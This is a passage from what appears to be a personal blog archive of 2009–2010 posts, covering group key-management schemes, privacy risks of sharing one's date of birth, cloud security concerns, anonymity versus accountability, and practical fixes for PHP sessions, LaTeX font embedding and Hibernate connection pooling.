Can a newly joined user u_r get its hand on old keys? No, because the old common solution did not consider the congruence x ~ r_r (mod n_r).

Can a user u_r who left the group access new keys? No, because the server removes the congruence x ~ r_r (mod n_r) from the CRT calculation.

2. The Access Control Polynomial (ACP) approach
Each user u_i is given a random secret value s_i at the time of joining. The server construct the following polynomial of order m+n and broadcast to the group whenever there is a leave or join.

f(x) = K + (x - H(s_1 || z))(x - H(s_2 || z))..(x - H(s_n || z))(x - H(a_1 || z))...(x - H(a_m || z))
where K - is the actual key, s_1,.., s_n are the random secret values given to n users, a_1,.., a_m are random fake values used to increase the entropy of f(x), z is a public random value, H is a hash function.

A user u_r with the secret s_r derives the key as f(H(s_r || z)).

Can a newly joined user u_r get its hand on old keys? No, because the old polynomials f`(x)'s do not have (x - H(s_r || z)).

Can a user u_r who left the group access new keys? No, because the server removes (x - H(s_r || z)) from the new polynomials f`(x)'s.

The scheme is quite simple. However the security of this scheme is neither formally analyzed nor proved.

3. The Access Control Vector (ACV) approach
Each user u_i is given a random secret value s_i at the time of joining. The server construct the following the matrix X of n by n + 1 and broadcast a vector created based on a random vector from the null space of X to the group whenever there is a leave or join.

X =
| 1 a_{1,1} .... a_{1,n}|
| 1 a_{2,1} .... a_{2,n}|
| ..................................|
| 1 a_{n,1} .... a_{n,n}|

where a{i,j} = H(s_i || z_i), H is a hash function, z_i's public random random values, s_i is the random secret value given to the user u_i.

The null space of such a matrix is always guranteed to be nontrivial (each row is linearly independent). Hence, there exists a non-trivial colomn vector Y such that XY = 0. The server picks a random vector Y from the null space and compute the ACV (Access Control Vector) and broadcasts.

ACV = (K, 0, ..., 0)^T + Y

A user u_r with the secret s_r derives the K by performing a dot product of ACV and KEV_r (Key Extraction Vector). A user can construct her KEV using her secret and public random z_i's as follows.

KEV_r = (1, H(s_r || z_1, ...., H(s_r || z_n))^T

Can a newly joined user u_r get its hand on old keys? No, because the vector Y in the old ACV's are not orthogonal to her KEV, dot product does not yield the key K.

Can a user u_r who left the group access new keys? No, because the server removes the corresponding row from X, now the vector Y in the new ACV's are not orthogoal to her old KEV.

The scheme is quite elegant. The security of this scheme is analyzed and proved. A downside of this approach is the computational cost at the server when the group size is large.

'Sights unseen' photography

2010-01-20T13:16:00.005-05:00

When I first saw the subject of an ongoing photography exhibition 'sights unseen' in the news, I was so exited and was like 'this must be a collection of really cool photos I have hardly seen before'. But my first impression about the exhibition was wrong. However, I found it not only EVEN MORE exciting, but it's inspiring! It's a collection of really cool photos taken by people who are not fortunate enough to see. This bbc audio slideshow tells it all.

(A photo taken by a blind person)

All this time it was wired into my brain that, if you are blind you cannot take photographs. I was proved wrong! And it goes well with good old proverbs.

As I was Googling about the subject, I found the link that photography can be a tool for social change quite interesting.

"Never, never, never quit"

2010-01-17T17:11:00.002-05:00

I truly admire the spirit of this story. Life is full of challenges; stories like this (and also this) remind us that we can overcome those challenges if we believe and act. Some people may not end up being the winners always, but we have to admire their spirit.

Effects of the failed christmas bomber..

2010-01-15T06:25:00.003-05:00

(Source: http://www.cartoonistgroup.com)

How to increase the PHP session timeout time in a shared host?

2009-12-12T00:28:00.002-05:00

I found this link useful.

(In a shared host, you've got to have your own folder to store your session data; otherwise, the garbage collector (which is invoked with the probability session.gc_probability(default value is 1)/session.gc_divisor (default value is 100) based on the global session timeout time session.gc_maxlifetime) may inadvertantly erase your session data).

Here's what I have at the top of each php file (extracted from the above link):


<?php
$id = session_id();
if (is_null($id) || strcmp($id, "") == 0) {
    $cookie_path = "/";
    $cookie_timeout = 60 * 60; // in seconds
    $garbage_timeout = $cookie_timeout + 600; // in seconds
    session_set_cookie_params($cookie_timeout, $cookie_path);
    ini_set('session.gc_maxlifetime', $garbage_timeout);

    strstr(strtoupper(substr($_SERVER["OS"], 0, 3)), "WIN") ?
    $sep = "\\" : $sep = "/";
    $sessdir = ini_get('session.save_path').$sep."ek_sessions";
    if (!is_dir($sessdir)) {
        mkdir($sessdir, 0777);
    }

    ini_set('session.save_path', $sessdir);

    session_start();
}
?>

Can I know who’s viewing my FB profile?

2009-12-11T22:36:00.006-05:00

FB Answer: (Merely browsing won't track you down (unless you consent to install an app that may track your moves). Good news for stalkers???)
Facebook currently does not provide an application that allows users to track profile views or statistics on the views of any specific user content. Third party developers, however, may offer applications that provide some of this functionality. Please keep a few things in mind for these applications:

Applications CANNOT track profile visits for users who simply go to another person's profile; Facebook has made this technically impossible.

In order to be tracked by an application, you will need to specifically agree to allow the application to track your actions.

Adding an application that provides this functionality is purely optional. If you do not want to participate, please do not add the application to your account.

Apparently, if you develop a such FB application to track users who visits your profile, it's a violation of terms.

I have seen claims about being able to track visitors your profile in FB, they simply seem to be incorrect. I have also seen claims about this ability in other social networks, but I don't know the truth behind such claims.

A question for social networks in general:
Is it good or bad for FB to provide the functionality to see profile stats to profile owners? pros/cons for FB? pros/cons for users (owner, viewers)? [IMO, this is a multi-faceted question; there is no definitive answer - need to consider many different aspects; and I am not in a position nor knowledgeable enough to answer this question.]
I, as a user, personally prefer if FB provides at least some anonymous statistics.

What others can collect from your browser?

2009-12-07T18:31:00.001-05:00

BrowserSpy

Are we risking only privacy in social networks?

2009-12-07T17:53:00.002-05:00

The answer is a clear no. In fact, I recently noted some possible security threats by just revealing your DoB alone. Some more simple layman thoughts on it..(in this post I am not talking about technical vulnerabilities of the social networs; there have already been several exploits)

We are kinda addicted to social networks such as facebook, twitter, myspace etc. Social networks are great to get connected with old friends and stay in touch with friends and families. And also to be up to date with technology, news, what's happening around us and know what others are upto. We love interacting with others and being connected. There is nothing wrong about it; but there is a limit, above which it could be harmful. The whole network works based on trust. Just one weak link of trust is sufficient to cause all sorts of troubles.

a couple of examples:
social networks - physical security??? an interesting combination!
We have seen people tweeting or facebooking, where they are, what their vacation plans, etc. This could be good information for burglers -- we invite and help burglers to break in.

one social network - and the rest???
There are so many social networks out there..chances are that you are only in a subset of them. Say you are in Facebook and not in Myspace. What does it prevent a bad guy from impersonating you in Myspace? Further, the impersonator can trick your friends to be her friends.

United we stand divided we fall

2009-12-06T11:51:00.002-05:00

(United we prevail divided we fail)
I am afraid to say that it is us, the ordinary citizens of SL, not them (who try to get into power or want to keep the power), who are going suffer due to on-going divisions in the country. Don't get me wrong; any country should have a strong opposition to have better governance (so that those who in power do not abuse it). But 50 years after independence we are unable to get rid of the narrow minded attitude to do whatever it takes to come to power or to continue to be in power.

Why I don't have the DoB listed in FB?

2009-12-03T20:54:00.006-05:00

If you noticed my FB profile, I only list the birthday (not the DoB). I am not listing the DoB, not because I don't want to reveal my age (of course, someone who is knowledgeable about the contextual information about the FB groups I am in (e.g. Saint Aloysius College - 1998 batch, UoM 1999/2000 batch, etc.) could infer my year of birth), but because of security reasons. DoB - Security??? do you see the connection?

The other day I went to my bank to withdraw some money, but I forgot to carry my bank card which has the bank account number. So I had to show/prove the possession of other credentials. After getting a photo ID of mine, the next thing the operator asked from me is my DoB. Imagine now someone faking my photo ID and having my DoB listed online, walk to the counter. What does it prevent that someone from withdrawing money from my account?

There are even greater consequences; There have been research suggesting correlation of public information to your SSN number. SSN number is confidential information; only certain service providers such as bank, rental office, insurance company, utility providers, know it; leaking it could be a disaster.

Recently, researchers from CMU have cleverly shown that one can narrow down the possible SSN numbers an individual can have using public information available. If the attacker knows your DoB and location, they can guess your SSN with high probability:

Information about an individual’s place and date of birth can be exploited to predict his or her Social Security number (SSN). Using only publicly available information, we observed a correlation between individuals’ SSNs and their birth data and found that for younger cohorts the correlation allows statistical inference of private SSNs. The inferences are made possible by the public availability of the Social Security Administration’s Death Master File and the widespread accessibility of personal information from multiple sources, such as data brokers or profiles on social networking sites. Our results highlight the unexpected privacy consequences of the complex interactions among multiple data sources in modern information economies and quantify privacy risks associated with information revelation in public forums.

SSN has the format xxx-xx-xxxx (Area Number (AN) - Group Number (GN) - Serial Number (SN)); AN and GN are location specific and anyone can get the list of numbers assigned in each state. This reduces the entropy as some level of randomness is sacrificed. You might wonder why AN and GN are predictable? Well, one reason might be that it could be helpful to identify impostors by checking based on the location of the person that she provides.

Here's a pattern that they have discovered (from the paper):

The above figure shows the distribution of AN, GN and SN number (y-axis) in Oregon in 1996 for some publicly available records. The x-axis is the 365 days which represent the DoB's of those people in the records. Notice the correlations.

The paper also mentions about the dramatic reduction of entropy of the SSN numbers. (For better security you need to have higher entropy. If you can inject more randomness, you get higher entropy and it becomes less predictable.)

Without auxiliary knowledge, the theoretical entropy of an SSN can be estimated at 30 bits (in log2).
The more granular knowledge of the assignment scheme that we have shown to be inferrable significantly decreases that entropy (for some states, down to 11 bits).

The point is that one piece of information alone may not be an interesting asset to an attacker and hence you may think it is safe. However, it is the correlation of different pieces that makes attackers life easier. With social networks and other online web sites booming, different pieces of our personal information are available through different locations. These public information could be used by attackers to engineer attacks which we may not imagine in our wildest possible dreams. (In short, the more public information available about us, the less entropy for our confidential information.)

Note: It would be much better for me from the security PoV to completely hide my birthday in FB. You might be wondering why I am not doing so; privacy is a strange thing; it is an economic good; it has trade-offs. I currently perceive that the benefits over-weighs the threats :-)
(Maybe I'll write about the privacy economy in a future blog; there has been a lot of research in this topic for quite some time.)

Thought of the day

2009-11-20T10:28:00.004-05:00

Just get started! (From one of the blogs I regularly read; I love to know the psychology behind how we act/react/perceive, etc.)

Thought of the day

2009-11-19T19:14:00.003-05:00

"A man who has one finger pointing at another has three pointing towards himself" ~ A Nigerian proverb

We are not perfect; we make mistakes; sometimes things don't work out the way we want; they simply go wrong. Think about a team work that didn't work out. We usually have the tendency to look outside of ourselves to put the blame on something or someone, don't we? Couldn't the outcome be different had you played a different role? Most importantly is it going to help pointing at something or someone? Probably not. Think about the above proverb before you point your fingers next time.

Thought of the day

2009-11-18T12:22:00.003-05:00

"Great minds discuss ideas. Average minds discuss events. Small minds discuss people." ~Eleanor Roosevelt

You have a great mind if you don't make fun of or thrash others (for your own petty advantage).

Clouds and Storms [Part 1]

2009-11-16T16:53:00.038-05:00

Decoded title: Security/Privacy issues in the Cloud (from the PoV of utility computing)
The objective of this post is to raise awareness about possible privacy/security issues that may arise in cloud computing paradigm - if you are a security researcher, where you may want to focus on; if you are a cloud provider, what you need to safeguard against and what customers would be expecting, if you're a cloud user (technical/non-technical), what you can expect and what you can do about it in order to minimize the risks.

(Note that there could also be security benefits of moving to the clouds, as opposed to maintaining your own infrastructure. For example, the clouds may provide more secured infrastructure and also can afford to provide expertise in security which may not be a viable option especially for small-medium businesses. Also, the virtual machines deployed may be better configured and virtualization inherently provides a certain level of security.)

As we all know, there is, in general, a gap between the research solutions and the industry implemented solutions; it is partly due to the fact that some elegant theoretical solutions (published even in top conferences or journals) are not practical. However, there are very many useful research that could well be utilized; they are not implement for one reason or another. One of the main reason is that most of businesses/agencies/users don't see a ROI on having security/privacy because the effect is not immediate. I'd also like to encourage in this post to think about security/privacy up front, no matter which stakeholder you are.

It is not a secret that cloud computing is getting a lot of attention these days. I think that the economies of scale (or the on demand elasticity) is the biggest drive for this compared to conventional IT outsourcing - money matters!. You can pay for the amount of storage you use or the amount of computational power you use. Not only businesses but also government agencies are moving to what appears to be the current big thing. (wonder what the next big thing might be?)

If you can relate to, for example, Amazon EC2, S3, Google Apps, free email services, chat serivies, Yahoo pipes, flickr, facebook, youtube, hulu, Zoho, 3Tera Applogic, etc. you are living in the cloud! irrespective of whether it's free, consumption based or subscription based. It's pretty much everything we currently do (I am not a big fan of cloud defintions; further there are disagreements about the origin of clouds [4] which I am not going to look at here).

Quote:
The Pew Internet & American Life Project released survey results in September 2008 reporting that 69 percent of Americans who are online use Web-based e-mail, store data or use software applications over the Internet. In October 2008, the market research firm IDC forecast that spending on IT cloud services would reach $42 billion by 2012 [2].

Let me start the $subject with the following quote:
"Privacy and security are the number one concern of organizations that are thinking about going into the cloud space." said Brendon Lynch, senior director of privacy strategy for Microsoft's trustworthy computing group [1].

What are these privacy/security concerns? The rest of the post aims to look into them. As we know, privacy/security can only be as good as its weakest link. The goal is to identify those weakest links.

In all cloud arrangements (SaaS, PaaS or IaaS), your data end up being in someone else's hand outside of your security perimeter. (I am still a free cloud user; I use gmail a lot, upload my documents to Google Apps, occasionally share some photos in Yahoo Flickr, share in Facebook - I don't know where all my online data, including sensitive data, physically reside - but my desire to have the data available from anywhere and to connect with people, has overridden the perceived risks.) Is the issue new? Not really. Well before the current clouds, there have been services to outsource network storage, databases, host web sites and IT services which also move your data out of your organization. What's different here? I see the following differences.

1. In clouds, we know that the data reside in one or more data centers, but we don't know which ones - not limited by space or geography. What are the legal/privacy/security implications?
2. Oursourcing has never been this cheap; an incentive to use the cloud which is not the case with the traditional outsourcing. What could go wrong, if it becomes perversive?

Does the locality of the data in the cloud matter? No physical boundary is an interesting outcome of the cloud. Note that different countries have their own legal framework. For example, data protection laws in US are very different from those in european countries (EU is more strict). In other words, depending on the locality of your data, you'll have different expectation of privacy. If a company X resides in a EU country, but their customers are mainly from USA. Due to differences in legal protections, I am not sure if X (consumer of the cloud) can ask the cloud provider to host their data/service in USA. Even if it is allowed, does X make an informed decision? Since the data resides closer to customers, it would be fast to access them; but what about security/privacy protection? If there's a data breach, in USA there will be less protection compared to EU. [On a positive note, inability to trace to a specific location is good thing from the security PoV; this provides some level of anonymity; if the attacker does not know where the target is, they have nothing to attack at]

How can a cloud provider efficiently identify if a consumer sticks with the terms of service (e.g: AWS ToS prohibits illegal uses)? Further, if a consumer uses the cloud services in a way that threatens, say, national security, but the cloud provider is unaware of it, who is held liable for the threat? Consumer or service provider or both? Extensive work on anomaly detection in the IDS research area could be very useful in this regard. Even if there are good anomaly detection techniques available, how do we define anomalous patterns in the cloud?

Can misbehaving consumers affect the benign ones? AFAIK, many cloud providers use Xen virtual machines. However, unless you pay extra, you, as a consumer, have to share the same physical machine or even same virtual machine. Virtualization techniques provide certain level of insulation, but I am sure there is an increased interest in this area as way of improving security in the context of cloud computing.

How long can a cloud provider retain my data after deleting? Also, once you put your data in someone else's facility, can you ever be sure of that they removed it completely? Deleting data once you indicate to the provider the intension is trivial if the provider manages only a few consumers. However, with the exploding use of the clouds, this has become a challenging problem. The report by Joseph Bonneau backs up this with the results from real applications [6]. For performance reasons, most of the providers delete them just like how the recycle bin works in your computer. For example, facebook retention policies say that "When you update information, we usually keep a backup copy of the prior version for a reasonable period of time to enable reversion to the prior version of that information". Like facebook, most of the vendors do not give a specific time about how long they retain your data in order to prevent legal actions against them. Clouds are increasingly used to store PII (Personally Identifiable Information) and the failure to delete them promptly could violate user privacy when the PII is available long enough for an attacker to obtain. It is a challenging task for cloud providers to balance performance and privacy/security in this regard - architecture/design should consider these concerns together, not in isolation. For consumers, it is better to choose a provider that provides quantitative/better claims about data retention period in their policies.

How can the cloud live up to the perimeter security expectations of consumers? Nico Popp at VeriSign raises the interesting question "what does perimeter security mean when the perimeter extends beyond the familiar boundaries of today's corporate network?" [7] In the current conventional setting, enterprises have their perimeter security controls (firewalls, IDS, etc.) placed in-premise either managed by themselves or outsourced; they protect the enterprise infrastructure, data from malicious traffic, malwares, unauthorized accesses, etc. With cloud computing, enterprises mobile users will be accessing organization's resources without going through the in-house perimeter security controls. It should be clear that the cloud computing create the need to have a some kind of proxy sitting between the cloud and the mobile users. Who should provide this proxy service? One approach is to have cloud providers, such as Google App engine, Microsoft Azure or Amazon EC2, themselves provide a security layer over the cloud. This may require them to go beyond their core competencies. An attractive solution is to provide Security-as-a-Service by third party who already has expertise in conventional perimeter security. In fact, Gartner predicts that by 2013 cloud-based services in messaging security controls will account for 60 percent of revenue [9]. For example, Zscalar does exactly that. The following diagram shows how it works:

(Courtesy: Zscalar)

Can enterprises let go of in-premise perimeter controls? They will still need to have some control in place. This brings the burden of having two sets of security controls in place (cost, management, etc.). Can we combine these two together? What are the challenges in doing so?
[On a positive note, there have been some research indicating that computers can be better protected against viruses if the anti-virus software is move to the cloud [10]].

In Part 2, I am hoping to discuss about the ownership of data, the control, what you can expect from free and commercial cloud services and some generic issues such as confidentiality and integrity (in light of insider attacks). So stay tuned. And feel free to comment/criticize/correct anything I have mentioned here.

References:
[1] http://www.informationweek.com/news/windows/security/showArticle.jhtml?articleID=221600544
[2] http://www.govtech.com/gt/727301?topic=117671
[3] Privacy in the Cloud Computing Era - A Microsoft Perspective
[4] http://www.cerias.purdue.edu/site/blog/post/a_quick_note_about_cloud_computing/
[5] http://blogs.cisco.com/security/comments/data_security_and_the_cloud/
[6] http://www.lightbluetouchpaper.org/2009/05/20/attack-of-the-zombie-photos/
[7] http://blogs.verisign.com/innovation/2009/06/are_clouds_of_change_looming_o.php
[8] http://www.technologyreview.com/computing/21303/
[9] http://www.gartner.com/it/page.jsp?id=722307
[10] http://www.eecs.umich.edu/fjgroup/cloudav/

Fixing "font not embedded" issue to pass the IEEE PDF eXpress check

2009-10-18T10:29:00.006-04:00

We recently had to make the format of a paper complaint with the IEEE PDF eXpress format. The paper did not pass the check in the first few attempts. Hence this blog post. I'd like to thank my colleague Ning Shang who did the most of the fixes to get it working. I am listing the fixes here so that anyone else who encountered similar issues may find this post useful.

Before that, I work on Ubuntu 9.04, kile 2.1 (the IDE), use the tools latex, bibtex and dvipdf to generate pdf files from tex/bib/cls files. (i.e. latex file.tex; bibtex file; (to attach the ref.bib file) latex file.tex; dvipdf file.dvi to finally get file.pdf)

The tex file uses the IEEE conference style. Additionally we used the following packages initially:
times, epsfig, graphicx, url, verbatim, amsmath, amsfonts

Issue #1: Document contains bookmarks
Fix: We had to remove the url package from the included packages lists and convert \url{address} to {address} in ref.bib.

Issue #2: Font Times-Italic, Times-Roman, Times-BoldItalic, Times-Bold, Helvetica, Courier is not embedded.

You can see what fonts are embedded and what are not, by using "pdffont file.pdf" and looking at the "emb" column. In our case, it did show that some fonts are not embedded.

Fix: We searched the Internet [1, 2]and found that in order to fix this (i.e. to embed all the required fonts) we need to do the conversion from tex to pdf in two stages. This is a dirty hack; but it works.

latex file.tex
bibtex file
latex file.tex
latex file.tex (Now we have file.dvi)
dvips -Ppdf -G0 -tletter file.dvi (Now we have file.ps)
ps2pdf -dCompatibilityLevel=1.4 -dPDFSETTINGS=/prepress file.ps file.pdf (Now we have file.pdf)

Accountability or anonymity or can we have both?

2009-10-15T17:07:00.004-04:00

This blog post was prompted from the question "what is important accountability or anonymity when it comes to online activities?" (short answer: it depends :)

Accountability is all about holding an individual accountable for what (s)he does; it's about identification. Anonymity, on the other hand, is about de-identification and the privacy of individuals.

From the PoV of on-going research, I find three main areas under which anonymity is being considered (am I missing any other ones?)

1. Anonymous access to resources
Here the goal is to allow users to access some service or resources anonymously - without revealing their identity. It's mainly about unlinkability - no two transactions can be linked to a single transaction. Bob buys a T-shirt from JC Penny and a denim from Old Navy; he used the same Chase credit card for both transactions. Bob may not want his bank, Chase, to know how he spent his money for privacy reasons - if it works like this, it provides unlinkability for Bob at his bank. However, unlinkability, in this case, may be undesirable due to security reasons; if the transactions cannot be linked to Bob, it would be really hard, if not impossible, to identify fraudulent activities by bad users. If Bob really wants to prevent his bank from knowing how he spent his money, the safest way is to use cash - that's the price Bob needs to pay to remain unlinkable! Note that are many cryptography based e-cash scheme to achieve the same objective.

As you can see, the decision to go anonymous has a cost. The issue is to decide if the benefits weighs higher than the cost. Take another example. You may not like, for example, Marsh or Pay Less, tracking all your transactions - you loose your privacy apparently without any gain for you. What if the loyalty card from Marsh or Pay Less, gives you a discount on most of the items you buy? Most of us (at least graduate students) will go for the loyalty card. The problem here is that there is no way for us to quantify the cost of loosing privacy (shopping history) and further the effect of loosing privacy may not be immediate.

What about online services? Would you be comfortable if a digital library service records all your moves? Think about it; when you go to a public library in your area, you can read whatever books, newspapers, magazines you want and whatever sections you want without being noticed/recorded. Anonymization techniques may come into your rescue and protect your privacy (i.e. your reading habits). But what do you loose for your privacy? If you are not being anonymous (unlinkable), the digital library service may offer you a better service by recommending books, magazines that are closely related to your reading habits. Same goes with online shopping web sites. Another related note, your online access traces could be a valuable source of income for free services such as youtube, hulu, etc.

2. Anonymous publishing
Here I am talking about publishing content without revealing your real identity. Most of the time it is a pseudonym under which one publishes. Publications could be writing a comment, blog post, news article, a paper, posting photos/videos, tweeting, etc. A pseudonym hides your real identity but does not prevent linkability. There are system such as FreeNet, Publius that even make it difficult, in not impossible, to censor what is published; once you publish, no one can take it out. There are good and bad things about anonymous publishing. It is a good thing if some one wants to voice their political opinion or something similar without having to face any repercussions. We make a very important implicit assumption here; the society we live always act good and whatever they do falls under what we perceive as 'acceptable'. It'd be naive to think we can always assume this to be true. We do have bad guys - true - it's only the minority - but this minority could do major damages. A simple example is to defame others hiding behind the screen for personal, political, business etc. advantage. Isn't it a cowardly act? No question about it.

Here's an example about a defamatory blog (in the own words of the victim - let's call him "Joe"):
There is someone who, for complicated psychiatric reasons, developed a severe dislike of me. This is an extraordinarily vindictive and immature girl whom I have NOT wronged in any remotely substantial way. She created an anonymous blog and posted alleging falsely that I'm gay and saying a number of inaccurate and very negative things about my character. (Basically, name-calling.) I'm concerned that this will affect future job prospects since the post appears within the first couple of pages of search results for my name. She confirmed to a mutual friend that she wrote the blog but refused to take it down. Google/blogspot says they don't take down defamatory posts without a court order.

(I am not sure what exactly is legally considered as defamatory. Let's assume it's considered defamatory. What actions can Joe take? IMO, hiring a lawyer for not so grave an incident like this may cost Joe. If he's worried about his online reputation, first thing he should do is to increase the online presence by posting/blogging true facts out, writing about topics of interest, etc. )

Now apply this to a business, corporate level or a popular person or even a major religion. The problem comes when we allow people to freely publish incorrect/falsified information without being accountable. Censor resistant systems makes the problem worse.

3. Data anonymization of statistical analysis
Here we talk about modifying existing records such that sensitive/private information about individuals cannot be inferred from the published data. For example, Alice is doing a survey of cancer patients in Indiana. A good source for her survey is medical records and patient information in the hospitals in Indiana. However, hospitals may not be willing to give Alice row data as it would violate patient privacy (and in fact not allowed under law). Since this study could be beneficial (e.g. correlating cancer to location, public facilities, living habits, etc.), hospital can anonymize the data such that Alice cannot link what is provided to her with individual residents of Indiana. In the research literature, there have been many work done in this area; k-anonymity, l-diversity, t-closeness are just to name a few. A key issue here is the trade-off between privacy and utility. The data can be completely anonymized providing the highest level of privacy but without any utility all or the data can be published as it is providing the highest level of utility but without any privacy. On-going research tries to strike a balance between these two parameters - sufficiently protect individually identifiable data and still able to perform statistical analysis. I don't have any problem with this type of anonymization; in fact, this type of anonymization is encouraged before releasing data for studies.

As we all know, if you take any real user base, a vast majority of them are good users and only a few of them are bad users. So whatever solution we provide should be beneficial to the vast majority. Since anonymity helps good users in certain scenarios, should we focus more on anonymity over accountability? There are consequences.

As per the first two types, a bad effect of anonymity is that it may reduce the accountability one perceives to have for their actions. This could be an incentive for good people to turn bad and bad people to worse. My mother used to tell us that too much of any thing is not good. The same applies here. We need to define an 'acceptable' level of freedom of speech and censorship resistance. IMO, there should be a way to identify bad people in anonymous systems while good people continue to remain anonymous.

Another bad side of anonymity is related to trust. We trust a publication that explicitly mentions the authors than an anonymous publication, don't we? Of course, there are other ways to increase the level of trust we place. For example, many people like it, if the author goes under a pseudonym and that pseudonym has a good history of publication, if it backs up the facts with citations or if it is a shared content management system (like wikipedia) and there is less dispute by other users, etc.

Here's another interesting point raised by Sarah Hinchliff Pearson in her blog:
The National Fair Housing Alliance (NFHA) has been fighting a defamation lawsuit brought by a real estate company that was the target of its fair housing testing. (Disclosure: I helped defend NFHA in this litigation at my prior firm.) NFHA conducted months of well-documented fair housing tests and then reported its results to the media. Despite NFHA’s due diligence, it has been subjected to the burden of ongoing litigation. Yet under amici’s proposed standard, it would likely not have faced this burden if it had reported the results anonymously on the Internet. By giving better protection to anonymous speakers, the heightened standard reflects an implicit judgment that anonymous speech should be valued more highly than regular speech. It also produces a perverse incentive for all speakers to withhold their name from reports, comments, and opinions online.

She argues that we should not place a premium on anonymous contributions. I agree with her when the anonymity is related to publishing. Further, anonymous access may not be desirable for access to restricted materials or when there is a legal requirement to audit. However, for routine tasks such as accessing a digital library (any other content that has a economical value but innocuous in nature), echoing your political opinion, it is desirable to have some degree of anonymity.

In conclusion, ideally I would like to see systems where good guys remain anonymous but bad guys are identified. Anonymity in certain cases is a good thing; but there are situations where it could lead to unpleasant consequences - that's where we need some level of accountability. In certain other cases, you may have to pay a price for remaining anonymous. It is likely the issues mentioned in this post will take time and effort to solve. You are more than welcome to provide your thoughts on this.

Update: 12/1/2009
Here's a good article about the dark side of Internet and it is related to the topic discussed above.

Thought of the day

2009-10-13T22:45:00.002-04:00

I saw the following quote in a friend's feed:

"The saddest failures in life are those that come from not putting forth the power and will to succeed". ~Edwin P. Whipple

I cannot agree more with this quote. Personally, I don't mind failing. However, I feel bad when I fail knowing that I didn't put enough effort to succeed. The more I think about this quote, the more do I feel certain that it's not just the skill/talent that matters, determination/willingness to prepare yourself plays a bigger role.

I try to keep my game simple; there are no short cuts - you've got to practice hard every cricket shot you want to master - you've got to prepare even harder if you are to innovate a new shot. Now apply that to whatever game you play in life. What's your game plan?

Overcoming hibernate/mysql connection reset issue

2009-10-05T22:11:00.009-04:00

One of the projects I have been working on uses Java1.6/JSP/Servlet/Hibernate3.2/Tomcat/MySQL5. Since it is just a prototype, I initially used the Hibernate's native connection pool management mechanism (which is not recommend for a production level deployment).

Every now and then, when we try to connect to the database server, it threw a connection reset exception. This happens because MySQL drops connections after every configured wait_timeout. But when I try to connect the second time, it works. It is not acceptable to have a piece of software that works in the second attempt! So, I tried different fixes.

I added the following property to hibernate.cfg.xml:

<property name="hibernate.connection.autoReconnect">true</property>

However it did not solve the connection reset problem. Still the first attempt failed. Apparently, the Hibernate's connection pooling library does not support this property.

From Hibernate (Jboss):
Hibernate's own connection pooling algorithm is, however, quite rudimentary. It is intended to help you get started and is not intended for use in a production system, or even for performance testing. You should use a third party pool for best performance and stability.

(It would be helpful for people to inform what is working and what's not. But can't complain these are free stuff.)

There are three possible avenues:
1. modify mysql.cfg to have a longer wait_timeout
2. use Tomcat managed connections
3. use a third-party connection pooling library

The first two options are out of my control and we only have limited privileges to mysql and tomcat instances. So, the only option was to look into #3.

I downloaded c3p0 and added the following configurations to hibernate.cfg.xml file have a basic setting (I did not try to optimize these figures just used the numbers that worked for others since the objective is not performance tuning, but to get it working.):

<!-- Min pool size -->
<property name="c3p0.min_size">5</property>

<!--Max pool size -->
<property name="c3p0.max_size">20</property>

<!-- Max idle time -->
<property name="c3p0.timeout">1800</property>

<!--Max statements - size of the prepared statement cache -->
<property name="c3p0.max_statements">50</property>

<!-- Set the pooling implementation to c3p0 -->
<property name="connection.provider_class">org.hibernate.connection.C3P0ConnectionProvider</property>

Those are the basic pool settings. Still, the problem of first time failure is not solved. We need to tell c3p0 swallow the first failure and transparently connect in the second attempt. This does have a performance issue - every time when you want to connect, it does this.

You have to set an extra c3p0 property using c3p0.properties file. Add the file c3p0.properties to the root of the class path (in classes or WEB-INF classes for example) and turn on the c3p0.testConnectionOnCheckout property in that file.

c3p0.testConnectionOnCheckout=true

Note from Hibernate:
Don't use c3p0.testConnectionOnCheckout, this feature is very expensive. If set to true, an operation will be performed at every connection checkout to verify that the connection is valid. A better choice is to verify connections periodically using c3p0.idleConnectionTestPeriod.

As you can see, they do recommend a polling based approach where Hibernate periodically checks for idle connections. But I guess this also depends on the how frequently the hibernate layer is accessed. In our case, it is not that frequent. I didn't try that option but it should work.

Other pooling libraries such as Apache DBCP, Proxool should also work. But I didn't have time to check them out.

References: 1, 2, 3, 4, 5

What DHS knows about you

2009-10-05T12:51:00.003-04:00

If you just wonder what DHS collects about you from travel agents, read on.

It is a good idea to use cash or use a one time credit card number (like the one Citi bank issues - which allows you to set exp. date, credit limit and have multiple numbers) if you are booking through a travel agent (and concerned about security/privacy) (assuming your PNR is passed to DHS upon booking?).

Or, we need ways to fly under the radar. Anonymous booking?

You can request your PNR's and other records of your international travel that are being kept by the U.S. Customs and Border Protection (CBP) division of the Department of Homeland Security (DHS). I haven't tried this. This link shows how to.

Both travel agents and airline reservation staff:
The CBP eventually admitted that their records include information about travel agents and airline reservation staff...

They collect information from other sources as well:
In February 2009, the DHS admitted that Amtrak and bus companies "voluntarily" provide the DHS with information on bus and train passengers travelling between the USA and Canada and Mexico.

Your travel data may be shared with other parties in addition to DHS:
If you traveled on an airline based in the European Union, or made your reservations or bought your ticket in the EU or from an airline office or travel agency or tour operator in the EU, you can also request your records (including an accounting of what information they passed on directly to the DHS or outsourced or transferred to Computerized Reservation Systems (CRS's) or other commercial entities in the USA), from the airline, travel agency, tour operator, or CRS. Even if they claim that you "consented" to data sharing, EU laws require that they disclose, on request, exactly what data about you they have "shared", and with whom. Note that you can make such a request of a USA-based airline if you bought your ticket from them in Europe. EU data protection law is applicable whenever data is originally collected in the EU, regardless of your citizenship or where the company is based...By subscribing to CRS's based in the USA, and by participating in code-sharing and other marketing (and data sharing) "partnerships", most airlines, travel agencies, and tour operators based in the EU have effectively outsourced and offshored the storage of all of their PNR's and customer data.

Reference: 1, 2

Open decentralized microblogging

2009-10-03T20:53:00.004-04:00

I recently wanted to access twitter updates through facebook. I clicked on the add twitter application, but after seeing the authentication anti-pattern they are using I backed off (yet, many of my friends have added it; looks like their perceived risk is less than the benefits they expect).

If an imaginary dude added twitter in to their FB profile, the conversation would have been as follows.
Dude: hey FB, I want to access Tweets.
FB: sure dude, give me your Twitter username and password. (domain - facebook.com)
Dude: my Twitter username and password.
FB: hey twitter, I am (pretending to be) the dude with this user name and password.
Twitter: hey dude (actually FB pretending to be the dude - which Twitter does not know), you are authenticated and welcome back to Twitter.
FB: dude, now you are all set.

Do you want to allow FB (or any other third-party service provider) to predend like you to some other service you are already using (e.g. Twitter)? What are the possible risks/benefits of doing it?

